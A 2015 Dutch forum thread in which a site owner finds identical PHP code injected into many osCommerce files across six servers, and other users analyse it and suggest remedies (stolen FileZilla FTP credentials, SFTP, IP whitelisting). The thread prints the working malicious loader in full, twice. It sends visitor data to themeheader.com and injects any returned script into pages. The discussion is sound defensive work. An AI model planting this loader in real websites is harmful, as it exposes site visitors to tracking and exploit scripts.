Meerdere sites gelijktijdig gehacked? - Privacy en beveiliging

woensdag 25 maart 2015 17:43

Acties:

0 Henk 'm!

I'll be back

Topicstarter

Vandaag kwam ik tot de onprettige ontdekking dat meerdere van mijn sites tegelijkertijd gehacked waren, tenminste dat denk ik.

6 sites op 6 verschillende servers bij verschillende providers ging tegelijkertijd uit de lucht. Nadat ik wat dingen vanuit backup heb teruggezet kreeg ik ze weer online. Er blijken tientallen bestanden met een stukje code te zijn 'geinfecteerd'. Hoewel de sites met elkaar onderling niks te maken hebben was het tijdstip van wijziging van de bestanden op alle sites hetzelfde, namelijk 23-03-2015 om 16:15 uur exact. In alle bestanden kreeg ik deze code random ergens tussen de normale code erbij:

<?php
#a662c2#
error_reporting(0); @ini_set('display_errors',0); $wp_wue43 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_wue43) && !preg_match ('/bot/i', $wp_wue43))){
$wp_wue0943="http://"."theme"."header".".com/"."header"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_wue43);
if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wue0943); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_43wue = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_43wue = @file_get_contents($wp_wue0943);}
elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_43wue=@stream_get_contents(@fopen($wp_wue0943, "r"));}}
if (substr($wp_43wue,1,3) === 'scr'){ echo $wp_43wue; }
#/a662c2#
?>

Ik heb al verschillende onderdelen opgezocht maar kom nog niet echt verder. Heeft iemand een idee in welke richting ik moet zoeken om uit te vinden hoe ik dit kan voorkomen?

Mijn servers zijn eigenlijk allemaal anders, de php versies, het besturingssysteem. de enige overeenkomst is dat ze oscommerce en wordpress (allemaal behoorlijk up to date) bevatten.

edit: dit lijkt er wat op: http://stackoverflow.com/questions/24374357/php-hack-what-is-this-code-doing

[ Voor 4% gewijzigd door shotputty op 25-03-2015 17:48 ]

Mijn specs; Arm 47cm | Benchpress 175kg | Shotput 16,99m | BW 125kg

woensdag 25 maart 2015 18:07

Acties:

0 Henk 'm!

Ploink

Wat hebben al die 6 sites wel gemeen met elkaar?
Waar zou een hacker een lijstje van die websites vandaan kunnen halen?

Misschien heb je een ftp client op jouw computer waarmee je de websites onderhoudt. Daar kan malware op staan die je login gegevens heeft gestolen. Een andere optie is dat je non-encrypted ftp verbindingen hebt gebruikt op een publiek wifi netwerk.

Ik zou de boel even grondig controleren en opschonen en al je passwords veranderen.

woensdag 25 maart 2015 18:11

Acties:

0 Henk 'm!

Thralas

Ploink schreef op woensdag 25 maart 2015 @ 18:07:
Misschien heb je een ftp client op jouw computer waarmee je de websites onderhoudt. Daar kan malware op staan die je login gegevens heeft gestolen.

Goede suggestie, het vermelden waard, maar het lijkt me echter stukken minder waarschijnlijk dan dat dat 'behoorlijk' up-to-date niet helemaal klopt, of dat er wat plugins 'behoorlijk brak' zijn.

@TS: Ga je error- en access logs eens aandachtig lezen. Of maak eens een complete lijstje van softwareversies (inclusief plugins).

Een andere optie is dat je non-encrypted ftp verbindingen hebt gebruikt op een publiek wifi netwerk.

Misschien stort er zo een vliegtuig in m'n achtertuin neer.

woensdag 25 maart 2015 18:11

Acties:

0 Henk 'm!

DiedX

Zoals Ploink al zegt: welke FTP Client gebruik je? In ieder geval één is bekend dat die zo lek is als een zeef. Ook moet je niet uitsluiten dat je eigen PC gehackt is.

DiedX supports the Roland™, Sound Blaster™ and Ad Lib™ sound cards

woensdag 25 maart 2015 18:13

Acties:

0 Henk 'm!

Compizfox

Bait for wenchmarks

DiedX schreef op woensdag 25 maart 2015 @ 18:11:
Zoals Ploink al zegt: welke FTP Client gebruik je? In ieder geval één is bekend dat die zo lek is als een zeef. Ook moet je niet uitsluiten dat je eigen PC gehackt is.

FTP zélf is zo lek als een zeef

Of ja, lek is niet echt het juiste woord. Het is simpelweg nooit ontworpen met security in gedachten.

Gewoon een heel grote verzameling snoertjes

woensdag 25 maart 2015 18:17

Acties:

0 Henk 'm!

DiedX

Compizfox schreef op woensdag 25 maart 2015 @ 18:13:
[...]

FTP zélf is zo lek als een zeef

Of ja, lek is niet echt het juiste woord. Het is simpelweg nooit ontworpen met security in gedachten.

Eensch, maar daarmee ga je niet uitleggen hoe over verschíllende providers zaken gehackt zijn. Ik zet in op een lokale exploit. Daarbij lijkt het mij sterk dat de router bij TS gehackt is

DiedX supports the Roland™, Sound Blaster™ and Ad Lib™ sound cards

woensdag 25 maart 2015 18:21

Acties:

0 Henk 'm!

Ploink

Thralas schreef op woensdag 25 maart 2015 @ 18:11:
[...]

Goede suggestie, het vermelden waard, maar het lijkt me echter stukken minder waarschijnlijk dan dat dat 'behoorlijk' up-to-date niet helemaal klopt, of dat er wat plugins 'behoorlijk brak' zijn.

Het punt is dat alle sites op hetzelfde moment zijn gehackt, wat sterk doet vermoeden dat de aanvaller een lijstje had van die websites en de aanval doelbewust simultaan uitvoerde.

Als het een botnet is die willekeurig zoekt naar kwetsbare websites dan is de kans erg klein dat het simultaan gebeurt, tenzij er misschien ergens een web pagina is waar het lijstje staat.

Als ik de code bekijk, deze haalt data op bij themeheader.com.
De code van stackoverflow doet ongeveer hetzelfde maar dan van templateinf.com.
Volgens de whois van de eerste en de tweede zijn ze van een rus en een chinees en geregistreerd bij dezelfde registrar. Die identiteiten zullen wel vals zijn. Themeheader is nieuwer en heeft een IP in engeland, Templateinf heeft geen IP en is dus niet meer in gebruik geeft een SERVFAIL op mijn dns request.

De code haalt een javascript op en injecteert dit in de webpagina. Dit zou een exploit kunnen zijn en misschien ook de manier waarop je eigen pc geinfecteerd is?
Je kan het script op je servers eventueel onschadelijk maken door de host templateinf.com te blokkeren.

[ Voor 37% gewijzigd door Ploink op 25-03-2015 18:57 ]

woensdag 25 maart 2015 19:44

Acties:

0 Henk 'm!

shotputty

I'll be back

Topicstarter

Bedankt voor jullie suggesties allemaal!. Ik ga zeker alle passwords wijzigen en uitgebreid de logs doornemen. Ik gebruik filezilla. Verder was ik op dat tijdstip niet online. Het is nu even gissen maar ik ben inderdaad de gemeenschappelijke factor. Ik zal later een update geven als ik er achter ben via welke weg het is gebeurd...

Mijn specs; Arm 47cm | Benchpress 175kg | Shotput 16,99m | BW 125kg

woensdag 25 maart 2015 20:07

Acties:

0 Henk 'm!

CH4OS

It's a kind of magic

Ik heb de code wat leesbaarder gemaakt:

PHP:

<?php
#a662c2#
error_reporting(0); 
@ini_set('display_errors',0); 
$wp_wue43 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_wue43) && !preg_match ('/bot/i', $wp_wue43)))
{
  $wp_wue0943="http://"."theme"."header".".com/"."header"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_wue43);
  if (function_exists('curl_init') && function_exists('curl_exec'))
  {
    $ch = curl_init(); 
    curl_setopt ($ch, CURLOPT_URL,$wp_wue0943);
    curl_setopt ($ch, CURLOPT_TIMEOUT, 20);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $wp_43wue = curl_exec ($ch);
    curl_close($ch);
  }
  elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen'))
  {
    $wp_43wue = @file_get_contents($wp_wue0943);
  }
  elseif (function_exists('fopen') && function_exists('stream_get_contents'))
  {
    $wp_43wue=@stream_get_contents(@fopen($wp_wue0943, "r"));
  }
}
if (substr($wp_43wue,1,3) === 'scr')
{
  echo $wp_43wue;
}
#/a662c2#
?>

Gezien de variabelen $wp_ hebben, gok ik dat je sites Wordpress draaien.
Er wordt uiteindelijk eea opgehaald via http:// themeheader {puntje} com/header?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_wue43). Mij zegt het niks, misschien jullie wat meer? Google verteld ook niet zoveel.

EDIT:
Hoor net van een maat van me, die zelf ook eea met Wordpress doet (ik ga er wel even vanuit dat je sites een Wordpress site hebben draaien), dat dit soort acties vaak ook een gevolg zijn van een theme gebruiken, die normaal gesproken niet gratis is er dus voor betaald moet worden.

[ Voor 9% gewijzigd door F_J_K op 25-03-2015 20:33 . Reden: Niet klikbaar gemaakt. ]

woensdag 25 maart 2015 20:14

Acties:

0 Henk 'm!

Ploink

CptChaos schreef op woensdag 25 maart 2015 @ 20:07:

Er wordt uiteindelijk eea opgehaald via
http....

Aangezien dat waarschijnlijk een malware site is zou ik dat even aanpassen zodat niemand per ongeluk op die link klikt en dan het haasje is

woensdag 25 maart 2015 20:20

Acties:

0 Henk 'm!

downtime

Everybody lies

shotputty schreef op woensdag 25 maart 2015 @ 19:44:
Ik gebruik filezilla. Verder was ik op dat tijdstip niet online. Het is nu even gissen maar ik ben inderdaad de gemeenschappelijke factor. Ik zal later een update geven als ik er achter ben via welke weg het is gebeurd...

FileZilla is een prima FTP-client maar wordt nogal eens bekritiseerd omdat het passwords niet encrypted opslaat. Het is dus vrij makkelijk door malware op je PC uit te lezen. Het opslaan van passwords in FileZilla kun je dus beter uitzetten.

woensdag 25 maart 2015 20:21

Acties:

0 Henk 'm!

CH4OS

It's a kind of magic

Ploink schreef op woensdag 25 maart 2015 @ 20:14:
Aangezien dat waarschijnlijk een malware site is zou ik dat even aanpassen zodat niemand per ongeluk op die link klikt en dan het haasje is

Vandaar dat ik de link 1:1 heb gekopieert. De code wordt hier immers omgezet naar tekst; gevolg is dus een niet werkend script / output.

woensdag 25 maart 2015 20:34

Acties:

0 Henk 'm!

shotputty

I'll be back

Topicstarter

Ik heb de bron in ieder geval al gevonden via de verschillende logs op de verschillende servers. Hij logt inderdaad gewoon in via ftp. Dit doet hij vanaf 85.158.181.18. Maar het kan natuurlijk ook een gehackte computer zijn vanaf waar hij/zij dat deed.
Heeft het zin als ik alle wachtwoorden wijzig en dan overstap op secure ftp en de wachtwoord niet meer opsla in filezilla?

Mijn specs; Arm 47cm | Benchpress 175kg | Shotput 16,99m | BW 125kg

woensdag 25 maart 2015 20:35

Acties:

0 Henk 'm!

F_J_K

Moderator CSA/PB

Front verplichte underscores

Link gesloopt zodat het niet is aan te klikken.

Het lijkt inderdaad waarschijnlijk dat je wachtwoorden zijn gejat Ga er van uit dat een van de machines waar je die opslaat besmet is. (Het is minder waarschijnlijk dat iemand ze fysiek heeft gejat).

'Multiple exclamation marks,' he went on, shaking his head, 'are a sure sign of a diseased mind' (Terry Pratchett, Eric)

woensdag 25 maart 2015 20:38

Acties:

0 Henk 'm!

F_J_K

Moderator CSA/PB

Front verplichte underscores

shotputty schreef op woensdag 25 maart 2015 @ 20:34:
Ik heb de bron in ieder geval al gevonden via de verschillende logs op de verschillende servers. Hij logt inderdaad gewoon in via ftp. Dit doet hij vanaf 85.158.181.18. Maar het kan natuurlijk ook een gehackte computer zijn vanaf waar hij/zij dat deed.
Heeft het zin als ik alle wachtwoorden wijzig en dan overstap op secure ftp en de wachtwoord niet meer opsla in filezilla?

Dat heeft enkel zin als je het doet vanaf een schone machine, dus niet je huidige PC. En ja, overal waar je SFTP kunt gebruiken moet je dat vooral doen en geen FTP meer. Wachtwoorden wil je sowieso niet in zoiets opslaan. Dan liever in iets als Keepass. Maar er is iets te zeggen voor het argument van de mensen van Filezilla: iedere manier van opslaan kan worden gecomprimeerd als je PC is besmet..

'Multiple exclamation marks,' he went on, shaking his head, 'are a sure sign of a diseased mind' (Terry Pratchett, Eric)

woensdag 25 maart 2015 20:38

Acties:

0 Henk 'm!

Ploink

CptChaos schreef op woensdag 25 maart 2015 @ 20:21:
[...]
Vandaar dat ik de link 1:1 heb gekopieert. De code wordt hier immers omgezet naar tekst; gevolg is dus een niet werkend script / output.

Nee tweakers maakt er een klikbare link van. Wie op die link klikt die opent themeheader.com in zijn browser. Ook al is het waarschijnlijk een 404 error, ook daar kan een exploit in zitten.
Je kan het beter zo doen:

http://themeheader.com/he..._SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_wue43)

edit: aangepast zie ik

Net geprobeerd met wget en ik krijg dan 0 bytes content terug, wel een http header.

code:

]$ HEAD http://themeheader.com/header?ip=%22.$_SERVER%5B%27REMOTE_ADDR
200 OK
Connection: close
Date: Wed, 25 Mar 2015 19:30:29 GMT
Accept-Ranges: bytes
ETag: "54e50875-0"
Server: nginx/1.4.4
Content-Length: 0
Content-Type: text/html
Last-Modified: Wed, 18 Feb 2015 21:47:33 GMT
Client-Date: Wed, 25 Mar 2015 19:30:29 GMT
Client-Peer: 5.45.64.23:80
Client-Response-Num: 1

Nu hopen dat ik geen schietschijf ben geworden

woensdag 25 maart 2015 20:41

Acties:

0 Henk 'm!

CH4OS

It's a kind of magic

Als de site idd een Wordpress site is en er wellicht een theme is gebruikt wat normaal geld kost, kan het ook zo zijn, dat de FTP gegevens middels een stukje code uit de theme is doorgegeven naar de eigenaar van de theme en dat die je op deze wijze heeft teruggepakt.

Dat gebeurd regelmatig, begreep ik van een maat van me.

EDIT: Ik wil je niet beschuldigen, maar het is wel iets om er rekening mee te houden.

[ Voor 13% gewijzigd door CH4OS op 25-03-2015 20:42 ]

woensdag 25 maart 2015 21:07

Acties:

0 Henk 'm!

Thralas

CptChaos schreef op woensdag 25 maart 2015 @ 20:07:
Ik heb de code wat leesbaarder gemaakt:

Thanks. Ik moet toegeven dat ik er blindelings vanuit ging dat het een dertien-in-een-dozijn $webapp compromise betrof, op basis van het verhaal van TS (code niet bekeken).

Nu ik dat wel heb gedaan:

Hoor net van een maat van me, die zelf ook eea met Wordpress doet (ik ga er wel even vanuit dat je sites een Wordpress site hebben draaien), dat dit soort acties vaak ook een gevolg zijn van een theme gebruiken, die normaal gesproken niet gratis is er dus voor betaald moet worden.

Dat klinkt plausibel. Het enige dat de code doet is het loggen van het IP, user agent en hostname van de request. Mits dit de enige wijziging is, lijkt me dit niet bijzonder nuttig voor iemand met als enkel doel het misbruiken van de resources van je server.

Zit het in een pagina die enkel bereikbaar is door een admin? Het loggen van gegevens van de 'dader' (degene die waarschijnlijk de desbetreffende theme of plugin geinstalleerd heeft of gebruikt) lijkt me een logische actie, alvorens de boel onbruikbaar te maken.

CptChaos schreef op woensdag 25 maart 2015 @ 20:41:
Als de site idd een Wordpress site is en er wellicht een theme is gebruikt wat normaal geld kost, kan het ook zo zijn, dat de FTP gegevens middels een stukje code uit de theme is doorgegeven naar de eigenaar van de theme en dat die je op deze wijze heeft teruggepakt.

Hoe zie je dat voor je? Je vult de credentials van je servergebruiker (en dus FTP-user?) toch in de regel niet in bij de installatie van Wordpress/themes/plugins?

Blijft wel een hiaat in eerdere theorie mbt. niet-legitieme themes/plugins/whatever.

EDIT: Na eens wat te hebben gegoogled ga ik vooralsnog toch voor de theorie van de gestolen FTP credentials (welke client?). Wat Google results hinten er overigens ook naar.

Verder: diezelfde Googleactie levert nog andere 'callback' domains op. Er zit niet echt direct een duidelijke (semi-)legitieme themebusiness achter lijkt het (maar of dat uberhaupt wat zegt).

Misschien is het dan simpelweg wat recon van degene die je FTP-credentials heeft om te bepalen welke sites/servers boeiend zijn om verder te misbruiken?

Fijn dat speculeren ipv. wachten op meer feiten

[ Voor 15% gewijzigd door Thralas op 25-03-2015 21:24 ]

woensdag 25 maart 2015 21:25

Acties:

0 Henk 'm!

shotputty

I'll be back

Topicstarter

Thralas schreef op woensdag 25 maart 2015 @ 21:07:
[...]

Zit het in een pagina die enkel bereikbaar is door een admin? Het loggen van gegevens van de 'dader' (degene die waarschijnlijk de desbetreffende theme of plugin geinstalleerd heeft of gebruikt) lijkt me een logische actie, alvorens de boel onbruikbaar te maken.

Fijn dat speculeren

Ik heb de code op dit moment alleen nog gevonden in OScommerce installaties in random files (zo'n 20% van alle files) en niet in de Wordpress bestanden. De logfiles van Proftpd laten zien dat iemand inlogt en de files wijzigt. Ben nu druk doende met handmatig wijzigen van zo'n 200 ftp passwords.....

Mijn specs; Arm 47cm | Benchpress 175kg | Shotput 16,99m | BW 125kg

woensdag 25 maart 2015 21:28

Acties:

0 Henk 'm!

shotputty

I'll be back

Topicstarter

Thralas schreef op woensdag 25 maart 2015 @ 21:07:
[...]

EDIT: Na eens wat te hebben gegoogled ga ik vooralsnog toch voor de theorie van de gestolen FTP credentials (welke client?). Wat Google results hinten er overigens ook naar.

Ik denk het ook... Alle passwords staan op 4 pc's in Filezilla. Ik ga daar wat aan veranderen.

Mijn specs; Arm 47cm | Benchpress 175kg | Shotput 16,99m | BW 125kg

woensdag 25 maart 2015 21:32

Acties:

0 Henk 'm!

Thralas

Dit is een interessante theorie om verder op te speculeren.

Eerst een compromise met vergelijkbare code, pas 10 dagen later een extern script ingeschoten. Lijkt me een typisch gevalletje van 'installs' (in dit geval: inclusion van javascript naar keuze, bijvoorbeeld een exploit kit) verkopen op eoa. underground market?

Ik ben niet thuis in die wereld, maar speculeer vrolijk verder.

woensdag 25 maart 2015 21:33

Acties:

0 Henk 'm!

CH4OS

It's a kind of magic

Thralas schreef op woensdag 25 maart 2015 @ 21:07:
Hoe zie je dat voor je? Je vult de credentials van je servergebruiker (en dus FTP-user?) toch in de regel niet in bij de installatie van Wordpress/themes/plugins?

Volgens mij is de API e.d. van WordPress dusdanig, dat het overal toegang toe heeft, ook qua instellingen.

shotputty schreef op woensdag 25 maart 2015 @ 21:28:
Ik denk het ook... Alle passwords staan op 4 pc's in Filezilla. Ik ga daar wat aan veranderen.

En gebruik de instelling, dat FileZilla de passwords encrypted opslaat.

[ Voor 26% gewijzigd door CH4OS op 25-03-2015 21:34 ]

woensdag 25 maart 2015 22:18

Acties:

0 Henk 'm!

Ploink

Thralas schreef op woensdag 25 maart 2015 @ 21:07:
Dat klinkt plausibel. Het enige dat de code doet is het loggen van het IP, user agent en hostname van de request. Mits dit de enige wijziging is, lijkt me dit niet bijzonder nuttig voor iemand met als enkel doel het misbruiken van de resources van je server.

Dat niet alleen.

PHP:

if (substr($wp_43wue,1,3) === 'scr')
{
  echo $wp_43wue;
}

Hij injecteert de respons van de http request in de pagina indien deze begint met een <script> tag. Dat script kan mogelijk een exploit bevatten.

woensdag 25 maart 2015 22:21

Acties:

0 Henk 'm!

downtime

Everybody lies

CptChaos schreef op woensdag 25 maart 2015 @ 21:33:
En gebruik de instelling, dat FileZilla de passwords encrypted opslaat.

Que?

woensdag 25 maart 2015 22:41

Acties:

0 Henk 'm!

shotputty

I'll be back

Topicstarter

Ik ga onderzoeken of ik via een whitelist van ipadressen ftp toegang via iptables kan beperken. Als iemand dan het wachtwoord weet dan komt ie er toch niet bij.

Mijn specs; Arm 47cm | Benchpress 175kg | Shotput 16,99m | BW 125kg

woensdag 25 maart 2015 22:48

Acties:

0 Henk 'm!

MsG

Forumzwerver

Ik heb ook eens met malware gehad dat die mijn Filezilla bookmarks uitlas. Sindsdien sla ik de bookmarks op zonder wachtwoord. Dan maar wat meer gedoe :-P.

Denk om uw spatiegebruik. Dit scheelt Tweakers.net kostbare databaseruimte! | Groninger en geïnteresseerd in Domotica? Kom naar DomoticaGrunn

woensdag 25 maart 2015 22:52

Acties:

0 Henk 'm!

Thralas

Ploink schreef op woensdag 25 maart 2015 @ 22:18:
Hij injecteert de respons van de http request in de pagina indien deze begint met een <script> tag. Dat script kan mogelijk een exploit bevatten.

Scherp! Ik ben in een slordige bui vandaag zie ik, misleid door de eerste assignment van die var

woensdag 25 maart 2015 23:08

Acties:

0 Henk 'm!

Saven

Administrator

downtime schreef op woensdag 25 maart 2015 @ 22:21:
[...]

Que?

Is voor mij ook nieuw idd

Filezilla heeft meerdere keren aangegeven dat encrypted opslaan helemaal geen toegevoegde waarde heeft

woensdag 25 maart 2015 23:54

Acties:

0 Henk 'm!

Ploink

shotputty schreef op woensdag 25 maart 2015 @ 22:41:
Ik ga onderzoeken of ik via een whitelist van ipadressen ftp toegang via iptables kan beperken. Als iemand dan het wachtwoord weet dan komt ie er toch niet bij.

Goed idee om de toegang te beperken op IP basis.
Dat kan misschien ook wel via de access-control van de ftp daemon zelf, afhankelijk van welke je gebruikt.

Ik gebruik zelf ook fail2ban om verdachte zaken automatisch te blokkeren.

donderdag 26 maart 2015 13:37

Acties:

0 Henk 'm!

CH4OS

It's a kind of magic

@Shotputty, gebruik je toevallig de WordPress plugin RevSlider? nieuws: Duizenden WordPress-sites serveren nog steeds malware. Wellicht dat door het gebruik van dit lek men erin heeft kunnen slagen om de inloggegevens te bemachtigen, waarop men de FTP gegevens bemachtigden?

[ Voor 24% gewijzigd door CH4OS op 26-03-2015 13:42 ]

donderdag 26 maart 2015 13:47

Acties:

0 Henk 'm!

Foamy

Fulltime prutser

Ware het niet dat hij al aangaf dat de sites op diverse servers draaien. FTP gegevens zullen dus niet direct misbruikt zijn, maar wellicht heeft hij inderdaad dezelfed plugin of hetzelfde thema op meerdere sites draaien.

blub

donderdag 26 maart 2015 13:53

Acties:

0 Henk 'm!

CH4OS

It's a kind of magic

Het zou dan een verouderde versie van de RevSlider zijn.

vrijdag 27 maart 2015 00:24

Acties:

0 Henk 'm!

CAPSLOCK2000

zie teletekst pagina 888

Dat ze allemaal tegelijk gekraakt zijn hoeft niets te betekenen. De betere cybercrimineel scant doorlopend internet af om een database te maken met wie welke software gebruikt. Als er dan een lek gevonden wordt hoeft hij alleen maar even in z'n database te kijken om op te zoeken waar de kwetsbare software draait en direct overal inbreken.

This post is warranted for the full amount you paid me for it.

vrijdag 27 maart 2015 19:41

Acties:

0 Henk 'm!

shotputty

I'll be back

Topicstarter

Ik heb nu bijna alle wachtwoorden gewijzigd en ben overgestapt van ftp naar sftp. Daarbij heb ik de sshd service ook gekoppeld aan een whitelist.
Ondertussen enkele honderden bestanden opgeschoond van het stukje code. Gelukkig is er niks 'ernstigs' gebeurd. Een wijze les voor mij!

Mijn specs; Arm 47cm | Benchpress 175kg | Shotput 16,99m | BW 125kg

Pagina: 1

Reageer